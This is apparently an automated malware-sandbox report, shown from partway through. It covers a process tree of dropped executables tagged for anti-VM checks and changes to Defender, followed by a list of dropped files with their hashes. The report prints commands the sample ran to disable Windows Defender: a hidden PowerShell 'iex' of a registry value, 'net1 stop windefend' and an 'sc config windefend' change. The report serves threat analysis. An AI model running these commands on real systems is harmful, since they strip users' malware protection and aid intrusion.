                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5488 -childID 3 -isForBrowser -prefsHandle 5584 -prefMapHandle 5580 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1328 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e9cfde70-c652-4c28-ad48-2aec7f0f9a94} 3556 "\\.\pipe\gecko-crash-server-pipe.3556" tab
                                  9⤵
                                    PID:5448
                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5716 -childID 4 -isForBrowser -prefsHandle 5800 -prefMapHandle 5796 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1328 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cb298444-b0fe-4a9e-85b4-abe1cfa53781} 3556 "\\.\pipe\gecko-crash-server-pipe.3556" tab
                                    9⤵
                                      PID:5472
                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5992 -childID 5 -isForBrowser -prefsHandle 5912 -prefMapHandle 5916 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1328 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e967d5c7-8d80-4865-bfc0-ecd18ac8f524} 3556 "\\.\pipe\gecko-crash-server-pipe.3556" tab
                                      9⤵
                                        PID:5480
                                • C:\Users\Admin\AppData\Local\Temp\1013729001\a2c29246b7.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1013729001\a2c29246b7.exe"
                                  6⤵
                                  • Modifies Windows Defender Real-time Protection settings
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Windows security modification
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5916
                            • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2l0932.exe
                              C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2l0932.exe
                              4⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              PID:2840
                          • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3C22x.exe
                            C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3C22x.exe
                            3⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:4076
                        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4R840N.exe
                          C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4R840N.exe
                          2⤵
                          • Modifies Windows Defender Real-time Protection settings
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Windows security modification
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2212
                      • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                        C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                        1⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • Suspicious behavior: EnumeratesProcesses
                        PID:3428
                      • C:\Windows\servicing\TrustedInstaller.exe
                        C:\Windows\servicing\TrustedInstaller.exe
                        1⤵
                          PID:4188
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
                            2⤵
                            • Command and Scripting Interpreter: PowerShell
                            • System Location Discovery: System Language Discovery
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:752
                            • C:\Windows\SysWOW64\sc.exe
                              "C:\Windows\system32\sc.exe" qc windefend
                              3⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:3200
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:3508
                            • C:\Windows\SysWOW64\whoami.exe
                              "C:\Windows\system32\whoami.exe" /groups
                              3⤵
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1448
                            • C:\Windows\SysWOW64\net1.exe
                              "C:\Windows\system32\net1.exe" stop windefend
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:1376
                            • C:\Windows\SysWOW64\sc.exe
                              "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
                              3⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:2036
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4664 -ip 4664
                          1⤵
                            PID:3596
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4332 -ip 4332
                            1⤵
                              PID:6276
                            • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                              C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                              1⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              PID:5940
                            • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                              C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                              1⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              PID:6956

                            Network

                            MITRE ATT&CK Enterprise v15

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                              Filesize

                              2KB

                              MD5

                              712a00a9d8164b3b6795c4e11800d2f1

                              SHA1

                              82952ef15a2e4e2b06cb149d3b206d11135128b5

                              SHA256

                              2a3b20384f9ce1100ea1c1d3fc24b874446506c627102da75ace1e7bcac4a052

                              SHA512

                              ab87d76996cf96e76f9182f72ffe16b1e014ac1ccbe2991a6cd85309622365fbf4a6e79023e616c529640f626cd3943bab9338816bf6ce6831cf5696d28ecd17

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\YY018DS9\download[1].htm

                              Filesize

                              1B

                              MD5

                              cfcd208495d565ef66e7dff9f98764da

                              SHA1

                              b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                              SHA256

                              5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                              SHA512

                              31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                              Filesize

                              21KB

                              MD5

                              722f2ee962b05f3cf11cadd970354333

                              SHA1

                              a058ee07091993d3b88e2182753878cf22def135

                              SHA256

                              c8f7ff136006bc1a2008ab471290f8df6d8c95b60b03e0a9ec1f29cc1e468fbe

                              SHA512

                              61211e8581e25e16f1e707f144e0df349386c4e758b022caa135b04eab570a4d8195be5c5320b24ec3a32fdebb78e6ac16200e6ad0940b9863bf8855538f09d7

                            • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\6ir3v68x.default-release\activity-stream.discovery_stream.json

                              Filesize

                              19KB

                              MD5

                              3a0f51b6024247e75ff3ad39afa56e1c

                              SHA1

                              1922e0365d0e27a711da50fe58cd83d157a6e846

                              SHA256

                              e4d312a33ebcf23d291aeb8307dce260197ed22917d2434d5b1f44bf65bbf59f

                              SHA512

                              4c43d7bf484150ced953881a4f956481dc7708d886c429d1bfec50aad80c355b3d0e700ef2793bebd70995528da8357512bb800dfe8a645cb7734af20e0082ad

                            • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\6ir3v68x.default-release\cache2\entries\92F4D5A4F9CED6E2E644D803AEE3647A0EA4D984

                              Filesize

                              13KB

                              MD5

                              1881d57960f34c2630f80e1ae8ba401f

                              SHA1

                              6bcdd4ec28531d46650793ad64f6ad4f4a9914ac

                              SHA256

                              ce55b9771b167d49736ff1a195e5dc03a63644153563555992ddcee206269693

                              SHA512

                              658c20f75888cb37cee8b3a049ffe87838860712df37285734a405f0e84fdb062727dbdf98d5d1b372e28983bbf2915d66757621c7f16bb493cfb9c80f2fd57d

                            • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\6ir3v68x.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

                              Filesize

                              15KB

                              MD5

                              96c542dec016d9ec1ecc4dddfcbaac66

                              SHA1

                              6199f7648bb744efa58acf7b96fee85d938389e4

                              SHA256

                              7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798

                              SHA512

                              cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

                            • C:\Users\Admin\AppData\Local\Temp\0PA2nHQdry

                              Filesize

                              114KB

                              MD5

                              eb8c6139f83c330881b13ec4460d5a39

                              SHA1

                              837283823a7e4e107ca7e39b1e7c3801841b1ef8

                              SHA256

                              489d5195735786050c4115677c5856e3ce72c3ecf2574be55021ad3d71caf40e

                              SHA512

                              88411dca362f0d9da0c093e60bf2b083340d0682b5ac91f25c78ac419cec1e325d0a5a0f96fd447d3d3806813cad7f1ca8cf9c423061327fbd16c8662f3cbddf

                            • C:\Users\Admin\AppData\Local\Temp\1013644001\Z9Pp9pM.exe

                              Filesize

                              2.5MB

                              MD5

                              2a78ce9f3872f5e591d643459cabe476

                              SHA1

                              9ac947dfc71a868bc9c2eb2bd78dfb433067682e

                              SHA256

                              21a2ac44acd7a640735870eebfd04b8dc57bc66877cb5be3b929299e86a43dae

                              SHA512

                              03e2cd8161a1394ee535a2ea7d197791ab715d69a02ffab98121ec5ac8150d2b17a9a32a59307042c4bbeffad7425b55efa047651de6ed39277dba80711454f9

                            • C:\Users\Admin\AppData\Local\Temp\1013675001\H3tyh96.exe

                              Filesize

                              1.7MB

                              MD5

                              40f8c17c136d4dc83b130c9467cf6dcc

                              SHA1

                              e9b6049aa7da0af9718f2f4ae91653d9bac403bb

                              SHA256

                              cafb60920939bd2079d96f2e6e73f87632bc15bd72998f864e8968f7aab9623b

                              SHA512

                              6760a0752957535ec45ce3307e31569ac263eb73157d6a424d6e30647651a4e93db7c0378028d9e0ce07e65a357d2bb81047064ccda2f6a13fa7402ee7794c2d

                            • C:\Users\Admin\AppData\Local\Temp\1013724001\1395d34d32.exe

                              Filesize

                              1.9MB

                              MD5

                              89984b4d62b3092f0527fe87c1e5c6ca

                              SHA1

                              9bdcf0585839783b2086027c4102400f948c0d9b

                              SHA256

                              cab9ba56e264feaf0e2812b368b02800d0f6bfa7b205d040765c8d4a0e2b4407

                              SHA512

                              7a627fd2bdbc128b3675d04447bc1c32fb017fa106aafa90c8223840abdd2934d4db849a42acaa9c7b3c1ce2847d3914d42a05b89c069b435b5486c1011e7c84

                            • C:\Users\Admin\AppData\Local\Temp\1013725001\UkYEOVR.exe

                              Filesize

                              3.6MB

                              MD5

                              5400651ebb0ecd81c935230ef3da29fb

                              SHA1

                              051db5331dc3061a478d16188a71d07a331a0b47

                              SHA256

                              6a9b3fe4414a52544b0f34d301b969d090ea26fa0e50a804a9c6294a5ccc7438

                              SHA512

                              e50505e2b346eac15a7320719239f1e9004d8cbff072df7d76a84fd795ef3bc5c0a17c429d36bb9e81329f80f20546806f3582f29562884ebbab2be95e3ed96f

                            • C:\Users\Admin\AppData\Local\Temp\1013726001\9521c8ff45.exe

                              Filesize

                              1.8MB

                              MD5

                              e2c644f77e079e34dcc18c8760a65dd2

                              SHA1

                              fa1e85594550e49ed06bd24fb17e049a8c06ba01

                              SHA256

                              ae5c7d34410a6e33a3c14fd2b676d74f7f8327a73741423f786ad04c8b3615c9

                              SHA512

                              6383486a2a6f7619c04ed0de9f16c681586bd3832b7cd4b9e5becbcf02baa8ddcd5edeae4e5a9ecd6e0f905c565c919b5a3594e5e7e7df28c7564b4407c09867

                            • C:\Users\Admin\AppData\Local\Temp\1013727001\51e04a8ac8.exe

                              Filesize

                              1.7MB

                              MD5

                              95f63fa3b720dbdd825b33874765bb00

                              SHA1

                              b39bcf6209f6184962becb07ab717d88f6b0a526

                              SHA256

                              a5ecd7659644043041d439d1ce868cbdf7c56d326cf3df6a869042f5dd47ffd7

                              SHA512

                              f7d80a622ca15b38a234a5873cd3f28ff0a2f6a54a99a64edfa425e7c53c96de55bcb364554ea321719a8ca6905b85e6a7bf0055bb5231e9b85fdd514ae54f75

                            • C:\Users\Admin\AppData\Local\Temp\1013728001\0d6f1088ef.exe

                              Filesize

                              944KB

                              MD5

                              eb9df6ff210cf59f8a339562c9631e87

                              SHA1

                              28f91de3a4369e55d7403493b93a94f5f2b7b446

                              SHA256

                              e4805ce3e6fdcfbbc54733f42014f1566d4d51f18dba887f3e7cbb704dfd1929

                              SHA512

                              228d8e928cf64eb07d1bb87101bc4b080d62cbd4f53f739aef3284b5dd2981cd00aa31ddd157678668ec1b67c0d17a89643b3b04708265ade3ea5d6bc499ef1e

                            • C:\Users\Admin\AppData\Local\Temp\1013729001\a2c29246b7.exe

                              Filesize

                              2.7MB

                              MD5

                              a53cb17121014c76f2aedbe320390342

                              SHA1

                              fa2a662deb2584787de6f315e1826f91c9f35e33

                              SHA256

                              5ef00189606675f868c482c3a876f9ce0192da23f3a5a1062a3230091d2fa44d

                              SHA512

                              9fca09d8303757885b844f6d69ea70fcd90ac8918fa8beb439c1183cebbe6ed6c52d3a7a15d691822679697a7fed3b1aa223c15c98d70fbd8f9e5ade002174be

                            • C:\Users\Admin\AppData\Local\Temp\BFfO790AVS

                              Filesize

                              116KB

                              MD5

                              f70aa3fa04f0536280f872ad17973c3d

                              SHA1

                              50a7b889329a92de1b272d0ecf5fce87395d3123

                              SHA256

                              8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

                              SHA512

                              30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

                            • C:\Users\Admin\AppData\Local\Temp\CxbidAjhUd.bat

                              Filesize

                              163B

                              MD5

                              33a9edf65b1bfb4ed43c56df284f7fbd

                              SHA1

                              da4a4131ed60c32e0b292053ff0feeab8aa7a3f2

                              SHA256

                              4d8e31a17d09b98c330592dcbdfd8dfb6a9bd6e7e6af56e1f88eec451660d475

                              SHA512

                              38d991cd085ba77e3443b74d62e2315a456b5d59f3627028379bac12ca5b4bb3b63a73f5e92adb6dbb2935dc314b5280871926b30c39ad2e9ac71fd55d25cf68

                            • C:\Users\Admin\AppData\Local\Temp\EKT3vN4wji

                              Filesize

                              40KB

                              MD5

                              a182561a527f929489bf4b8f74f65cd7

                              SHA1

                              8cd6866594759711ea1836e86a5b7ca64ee8911f

                              SHA256

                              42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

                              SHA512

                              9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

                            • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4R840N.exe

                              Filesize

                              2.7MB

                              MD5

                              9a06afe4d0ac27f852f28d9112feac8d

                              SHA1

                              9005416c2e33194f64554b53f1dee41db98b2b62

                              SHA256

                              337825adc875562e69425d93440c3861025e3902ee4a314d3bc2b7dd7ea52fc5

                              SHA512

                              d398d2da0769c271707fda2ebdb8062462f70b3053bddf5e4b94f7e2f51a555777ef67e8f200e2a136dcb13f3edb161da96d8c88d8c89262ea3ff9da6bf27592

                            • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\p4Y09.exe

                              Filesize

                              5.4MB

                              MD5

                              ece6dcb7a45437006d61948a848d4bed

                              SHA1

                              d905141d304216107155426d4ef904825cb667bd

                              SHA256

                              7163ca93a24a33a8c94cc0f94bdf0524f60b1aeaf831fa96a5e0dd03c2094ce1

                              SHA512

                              9eb0474961eb34e80a92b16f43f987d6d98881a37db3cdeeea5c7d1430f056bf9d94d25b50fb91ac7c1d6fac9c98ea44039b2861097b08304b4ea875770b7e8c

                            • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3C22x.exe

                              Filesize

                              1.7MB

                              MD5

                              2d6a3cc874baba71f5181f3adecac06c

                              SHA1

                              f7e8058bb3dacd8e2b95c18973949c82393f1663

                              SHA256

                              e1e97e112e5e4216775103415a0d71abd20d48ffa3bbbf31bb804b8da176b45e

                              SHA512

                              e80524ec21b4d2edb4950315be008d5c0961dbb2de8130e3f54e87b7dc1bd66ec5dcc98271548d2594a590eb08ddb1e3ed1a1ea640b29b2223ef38bccc87e668

                            • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\L9O32.exe

                              Filesize

                              3.6MB

                              MD5

                              3f89bf43283957b5f2b030c527d094b7

                              SHA1

                              7946841e27c1fa5725a17d0e799001dcbd642225

                              SHA256

                              246cfab9ab08a4b33c0126e812784df4429c028758dfd5dc0ca17d5f4e628db2

                              SHA512

                              ad88dbaeac462f6ddc576400b60c6768307630293e34f333d1c0fc88cc841b625b4acdd60d9cd401840ce11547868cba3a9bc6aa1702741be26028bbacdf47ba

                            • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1E05b7.exe

                              Filesize

                              3.1MB

                              MD5

                              55dec15c0573c5b792c1bfe25b9e6987

                              SHA1

                              8fcb5377407acbb82fdf416ee0842d581dd5758a

                              SHA256

                              45ae49cad00c92d160b7c04158b1c6118e083b0e9185a669bd46792791435009

                              SHA512

                              1465fb93e5c18d3a53f74141d903b434d4bb09df171477621a39e7c76603db96182d86b03794c2210b10ac1d6e6d655e570163bcf4acf5dac9692e8977137460

                            • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2l0932.exe

                              Filesize

                              1.8MB

                              MD5

                              3a65c654a1bef7f263525f637913d2ce

                              SHA1

                              37df01f86c63bb4a4bacf10b5b0bccd2d5fa922b

                              SHA256

                              f82a6ca347b6b8069867cae82b48a3523eea1da33c630b889fdfc93b5e091fe9

                              SHA512

                              31687484cbcdb904c14a96305049e7fd664ed92cf8a4871d460e66f7cb29081549b4cad67179b1ea61e3ab28eb9b51e34f1746256756fae1ed8246d0c6d5fa89

                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jsj4pdbf.d0c.ps1

                              Filesize

                              60B

                              MD5

                              d17fe0a3f47be24a6453e9ef58c94641

                              SHA1

                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                              SHA256

                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                              SHA512

                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                            • C:\Users\Admin\AppData\Local\Temp\tmpaddon

                              Filesize

                              479KB

                              MD5

                              09372174e83dbbf696ee732fd2e875bb

                              SHA1

                              ba360186ba650a769f9303f48b7200fb5eaccee1

                              SHA256

                              c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f

                              SHA512

                              b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

                            • C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

                              Filesize

                              13.8MB

                              MD5

                              0a8747a2ac9ac08ae9508f36c6d75692

                              SHA1

                              b287a96fd6cc12433adb42193dfe06111c38eaf0

                              SHA256

                              32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03

                              SHA512

                              59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\AlternateServices.bin

                              Filesize

                              10KB

                              MD5

                              6ce4a1d1183f16b966dd4a678b49a430

                              SHA1

                              0a207cfc7c31d187365fd9717c788b9e1bee61ca

                              SHA256

                              3b37b4eea69831c50176ca43ecc76567587adb949449b435e12a346ccdcb0cbf

                              SHA512

                              592151a4228a028d4582f24262ddb70856a9f47d6c4a9b94f3fbdb3c4ea735560ab459c6a2c9f5c24866a9374a66ac95b390cfc13f83c505cf94e934f9d48a7e

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\AlternateServices.bin

                              Filesize

                              7KB

                              MD5

                              c56b56a163934e48fcbed14b4fa17d5a

                              SHA1

                              c679dd182c4eadb779000364dd068885e37fac49

                              SHA256

                              2ac832d6827618f244a802cb03c6f0a902ef9524e226de1083efc63705930aed

                              SHA512

                              947dffa0b4fc70185d7b27d0825c794b7adcd17d301714d478c2b70f3eac9d87ab70ec2bb62d6d937b7f17a37183bf3c542203a71222892f63036f2312368395

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\cookies.sqlite-wal

                              Filesize

                              256KB

                              MD5

                              45caaea1b44c6319f71ec72188ecb138

                              SHA1

                              53c942920a14bc41b9445ba938f47d603be81350

                              SHA256

                              29bd551d37d5d17efb9231ddb7df011b2e3c50fc9b01635cae8eb711b45db7a8

                              SHA512

                              57aafc476918e7ec959c6c6d489bd5862b244a952a81563365924d54be99ea0f93121f2965d4a162a4836cf6739993eba0d23a29e53f9513c078542cacd7ee88

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.bin

                              Filesize

                              23KB

                              MD5

                              4d8e0735ddc5b65306f0ba31b27cde95

                              SHA1

                              0d7caeb69e761622780c4c7274422f75d2c5ea0d

                              SHA256

                              3af38cbb5286642fa9ac4d5d96e0087ef7e6585c2da7477a9e0647040a56e73d

                              SHA512

                              630ed3657acdbc1d9babe6c81fd5b5614e0164676d36318b59b1217259205f5c63d542e21f611365e1df49fccdfc12d8955bb646690305f9c789b3fc3e64e307

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.bin

                              Filesize

                              5KB

                              MD5

                              584885efb01cb2975bc82f2a2d584c28

                              SHA1

                              9d4e601e02208a990df123d9a0f7b16e9f3763ef

                              SHA256

                              e424ab0b9bc5710fecf877f089d01e40d408492078a0cb34f528568443828c72

                              SHA512

                              047f2018c21d970f4cecb3606c3057887e8668601ec843f201cb44937b844fcd16b3df15d32a7bd7c3b9350e069f358ef8f7158d69b936383090eb10de9c30f5

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.bin

                              Filesize

                              15KB

                              MD5

                              2bb2addbf647fdac845b41ab7bb02093

                              SHA1

                              762764998236a03531d9279ffcdca382870fa3fd

                              SHA256

                              126dccc44c85f9a6791f108011bb199dc0324195c8432034bf2548d09e9e5f0b

                              SHA512

                              3fa033ad2ef2e79be6083e9e9490abaabb260376d2cd588eec5ae4fd710f2067ee793ee10653999183f85814434d7123fc1ba3b9c4db52328d33ec41dccb894f

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.tmp

                              Filesize

                              5KB

                              MD5

                              8614dbd147089a86a281c656d78c2f88

                              SHA1

                              0cf1e6b9319275895118f6513cdbe096160f390d

                              SHA256

                              a47527f5c3b6352fc47924b52b8c61e5533f512e8fc297be3e367b670384df52

                              SHA512

                              b0ae1e3d4885cf4fbe457ea78ad160529798467411dd57845a209a8d7cb5afc0399650243401aa5a98c793ac9d145a6bba80f7d5838384317979069f5dc5669f

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.tmp

                              Filesize

                              5KB

                              MD5

                              76784d414da8d41722de79f493476ed6

                              SHA1

                              c945e513c7dc74971218e72a257ee338ab4311cc

                              SHA256

                              f43b81d913bc81ee1df13fe9c7b7942b177b95a074e067f7f3fd52d664dfe949

                              SHA512

                              7ad09967802034139d401f972b651a7865541749c98a873ce09377b4f3c3d968af285e05a63689d7ddd8dd3ea60668a247fd448eb4bcee9c1603d496e85bf5be

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.tmp

                              Filesize

                              15KB

                              MD5

                              32cabd3ed8c71d82855b123868fd5042

                              SHA1

                              c802e952860cf3d132cd6ea243dd010d893a5716

                              SHA256

                              e3beb194669bdb84a52a7b378e4aa4c24221d3ef489b5dbb32c61c90a03a1935

                              SHA512

                              ee48c69347d2d50964e5e69c5e91b99367d1ae632fd916916297754b0887c7a2dcb9d5b0400bbb055e0700d0c3f54e1d8c0c73d5d0702471bfcb07cca4f2746c

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.tmp

                              Filesize

                              15KB

                              MD5

                              83e51c519a701498ad3e82e190c9fc54

                              SHA1

                              49467f9ebd5bddf5358bf795f67791bcdd48f473

                              SHA256

                              fa87de5ace790cd4a9e6ea70751981c6e132b8ef2111545425ad50d605863c9d

                              SHA512

                              61d3dce201e387a25508c76497d21bbc06eb99cbab46b3a8604ed85d7af327f915acf8da9859ee99dbfaeca0e152f48e2505c6685dd392271e48a5f01a45aebf

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.tmp

                              Filesize

                              15KB

                              MD5

                              c2e84ac7559ea0960af859689eeb8526

                              SHA1

                              256fc0e017bba64d0a0c4d53e9f24355e0de72c8

                              SHA256

                              480adddb1ebbffa2d244e7f1e97a8742a213244e8bd70946c0abef9df1ac3d9b

                              SHA512

                              bba92153309d635f51c040feb121bc9ce04c4bf17676bb85ce906a8d094c58457b1e9980f7fc76e61a8bb1b6ae26b30501c1f1cce7d0e5aa3b680f78b49e1b4f

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.tmp

                              Filesize

                              6KB

                              MD5

                              b5789f935b5791364d8fd5a763fac67b

                              SHA1

                              1cca27e0a44814e7e1a3c6d757b6952d70a80843

                              SHA256

                              37d9b2421c65bb6bf1ad0744ca776ab149473e80d8001babb0443e64dabc6b10

                              SHA512

                              35663640c782d1210c1623acd06ee03977c3f77ca30e45c8270d65fd884bb5bcb7929e652440f6d477f2036f8c6b80ac91a2797c3463734d7deb611ce3d18856

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.tmp

                              Filesize

                              6KB

                              MD5

                              45d460b5ce32962eaebcef78145282b6

                              SHA1

                              b1d1f2caadbd3b89699281c0278e7d03c1a66754

                              SHA256

                              d99a9504f3eef44b5d4d4b81f1a6a6825a441867bbbaa7f6b3edfdf895f6671b

                              SHA512

                              c7f71f584411b22478ed56580c50fa0489484ca561da599bc15410d55a840aa0decb09c6420456f4b4687aaab5fd8665ab61ee5a2f6dbfca96d65eca6d30e1bd

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\pending_pings\79f63c78-272f-4e75-8b92-9e82a2da9c0a

                              Filesize

                              671B

                              MD5

                              bd836dfa0f504b20769ce6770e64b07c

                              SHA1

                              4ad124a90df4d20294fe3d832677ff0474a096ca

                              SHA256

                              967b26aef76c9ca3507f113713827eb56e70f1cb4bc98db9a17a6a2e60d70105

                              SHA512

                              bcec1a455c9f3e20fbd87881759cd86cedf000d87f02daaeea77020b2495db0a6dcc0a28fb86aaeb1b3fa608be74c6f2ed368ef9535118cfc249356f4f490382

